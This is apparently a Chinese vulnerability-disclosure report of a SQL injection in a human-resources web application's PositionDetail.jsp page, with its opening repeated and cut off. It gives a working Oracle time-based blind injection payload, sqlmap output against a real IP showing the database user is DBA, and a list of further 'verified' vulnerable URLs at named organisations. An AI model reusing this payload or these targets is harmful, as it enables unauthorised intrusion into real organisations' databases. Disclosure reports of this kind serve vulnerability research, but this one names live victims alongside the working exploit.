### 简要描述: ----------------------------------- 说点啥 ### 详细说明: [<img src="https://images.seebug.org/upload/201407/09172603828f8c376c669ace4f60371f368e3c3b.png" alt="472F3300-37DA-4FDD-AAF3-E36E8A5A52F7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/09172603828f8c376c669ace4f60371f368e3c3b.png) [<img src="https://images.seebug.org/upload/201407/09172751d662bc843259287c82833cfc2deeb393.png" alt="7DD296A6-915C-4763-9C00-E0110C272A7E.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/09172751d662bc843259287c82833cfc2deeb393.png) ``` /hrss/rm/PositionDetail.jsp文件中PK_EMPTY_JOB参数存在SQL注入漏洞 ``` ``` 直接丢SQLMAP里跑: http://219.140.193.253/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& GET parameter 'PK_EMPTY_JOB' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection points with a total of 114 HTTP(s) requests: --- Place: GET Parameter:...
### 简要描述: ----------------------------------- 说点啥 ### 详细说明: [<img src="https://images.seebug.org/upload/201407/09172603828f8c376c669ace4f60371f368e3c3b.png" alt="472F3300-37DA-4FDD-AAF3-E36E8A5A52F7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/09172603828f8c376c669ace4f60371f368e3c3b.png) [<img src="https://images.seebug.org/upload/201407/09172751d662bc843259287c82833cfc2deeb393.png" alt="7DD296A6-915C-4763-9C00-E0110C272A7E.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/09172751d662bc843259287c82833cfc2deeb393.png) ``` /hrss/rm/PositionDetail.jsp文件中PK_EMPTY_JOB参数存在SQL注入漏洞 ``` ``` 直接丢SQLMAP里跑: http://219.140.193.253/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& GET parameter 'PK_EMPTY_JOB' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection points with a total of 114 HTTP(s) requests: --- Place: GET Parameter: PK_EMPTY_JOB Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: PK_EMPTY_JOB=1001A11000000000G9WA') AND 3750=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(119)||CHR(83)||CHR(84),5) AND ('nlJx'='nlJx& --- [16:32:22] [INFO] the back-end DBMS is Oracle web application technology: JSP back-end DBMS: Oracle [16:32:22] [INFO] fetched data logged to text files under '/Users/loli/sqlmap/output/219.140.193.253' ``` ``` current user is DBA: True ``` [<img src="https://images.seebug.org/upload/201407/09164325c42ab514edcb091ad718451b5cc638de.png" alt="YONGYOU1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/09164325c42ab514edcb091ad718451b5cc638de.png) ### 漏洞证明: 给点URL(已验证): ``` http://59.173.0.46:8090/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& 中冶集团武汉勘察研究院有限公司 http://120.40.72.157:4001/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001V110000000000O0W& 福建省石油化学工业设计院 ```
